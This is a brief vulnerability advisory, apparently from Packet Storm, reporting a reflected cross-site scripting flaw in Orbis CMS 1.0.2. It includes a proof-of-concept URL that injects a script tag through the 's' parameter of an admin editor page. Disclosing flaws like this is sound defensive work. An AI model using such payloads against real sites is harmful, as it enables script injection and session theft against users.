Orbis version 1.0.2 suffers from a cross site scripting vulnerability.
c74060892392d1e6c988c4ae1b6b3df0a75642d7841842a0a88562b31db82d5c------------------------------------------------------------------------
Software................Orbis 1.0.2
Vulnerability...........Reflected XSS
Download................http://www.novo-ws.com/orbis-cms/
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
An XSS vulnerability in Orbis 1.0.2 can be exploited to
execute arbitrary JavaScript.
--PoC--
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed